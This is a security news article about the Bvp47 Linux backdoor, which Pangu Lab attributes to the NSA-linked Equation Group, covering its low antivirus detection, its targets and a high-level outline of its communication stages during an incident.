NSA-linked Bvp47 Linux backdoor largely undetected for 10 years

A report published today dives into the technical aspects of a Linux backdoor now identified as Bvp47 that is linked to Equation Group, the Advanced Persistent Threat Actor tied to the US National Security Agency.

Bvp47 has survived until today almost undetected, although it was first submitted to Virus Total’s antivirus database nearly a decade ago in late 2013.

Until this morning, only one antivirus engine on Virus Total detected the Bvp47 sample. As the report spread through the infosec community, detection began to improve, being flagged by six engines at the time of writing.

Bvp47 Linux Backdoor Detection Until Feb 23, 2022
source: BleepingComputer

The Equation Group Connection

The Advanced Cyber ​​Security Research team of Pangu Lab, a Chinese cybersecurity company, claims to have discovered the elusive malware in 2013, during a “forensic investigation of a host in a key national department”.

The Bvp47 sample obtained from the forensic investigation turned out to be an advanced backdoor for Linux with a remote control function protected by the RSA asymmetric cryptography algorithm, which requires a private key for the activate.

They found the private key in leaks published by the Shadow Brokers hacker group between 2016 and 2017, which contained hacking tools and zero-day exploits used by the NSA’s cyberattack team, the Equation Group.

Some components of the Shadow Brokers leaks have been integrated into the Bvp47 framework – “dewdrop” and “solutionchar_agents” – indicating that the implant covered Unix-based operating systems like mainstream Linux distributions, JunOS, FreeBSD and Solaris from Juniper .

Besides Pangu Lab attributing the Bvp47 malware to the Equation group, the automated analysis of the backdoor also shows similarities to another sample from the same actor.

Kaspersky’s Threat Attribution Engine (KTAE) shows that 34 out of 483 strings matched those in another equation-related sample for Solaris SPARC systems, which had a 30% similarity with encore another malware Equation submitted to Virus Total in 2018 and published by threat researcher Deresz on January 24, 2022.

Correlation of Bvp47 Linux backdoor with other Equation malware
source: Kaspersky

Costin Raiu, Director of the Global Research and Analytics Team at Kasperskytold BleepingComputer that Bvp47’s code-level similarities match a single sample of the company’s current malware collection.

This indicates that the malware has not been widely used, as usually happens with high-level malicious actor hacking tools, which use them in highly targeted attacks.

In the case of the Bvp47 Linux backdoor, Pangu Lab researchers say it has been used on targets in the telecommunications, military, higher education, economics, and science sectors.

They note that the malware affected more than 287 organizations in 45 countries and went largely unnoticed for more than 10 years.

Linux Bvp47 Backdoor Targets
source: Pangu Laboratory

Attack stages

Pangu Lab’s incident analysis involved three servers, one being the target of an external attack and two other internal machines – a mail server and a corporate server.

Bvp47 malware attack
source: Pangu Laboratory

According to the researchers, the rotated threat actor established a connection between the external server and the mail server via a TCP SYN packet with a payload of 264 bytes.

“Around the same time, the [email] the server connects to [business] server’s SMB service and performs certain sensitive operations, including connecting to the [business] server with admin account, trying to open terminal services, list directories and run powershell scripts via scheduled tasks” – Pangu Lab

The company’s server then connected to the mail machine to download additional files, “including the Powershell script and the second stage encrypted data”.

An HTTP server is started on one of the two compromised machines, serving two HTML files to the other. One of the files was a base64-encoded PowerShell script that downloads “index.htm”, which contains asymmetrically encrypted data.

A connection between the two internal machines is used to communicate encrypted data via “its own protocol”, the Pangu Lab researchers explain in their report.

The researchers were able to restore communication between the servers and summarized it in the following steps, where machine A is the external system and V1/V2 are the mail and corporate server respectively:

  1. Machine A connects to port 80 of server V1 to send a keystroke request and start the backdoor program on server V1
  2. Server V1 reverse connects the high-end port of machine A to establish a data pipeline
  3. V2 server connects to open backdoor web service on V1 server and gets powershell execution from V1 server
  4. The V1 server connects to the SMB service port of the V2 server to perform command operations
  5. The V2 server establishes a connection with the V1 server on the high-end port and uses its own encryption protocol for data exchange
  6. Server V1 synchronizes data interaction with machine A, and server V1 acts as data transfer between machine A and server V2

Referring to the above communication technology between the three servers, the researchers assess that the backdoor is the creation of “an organization with strong technical capabilities”.

Comments are closed.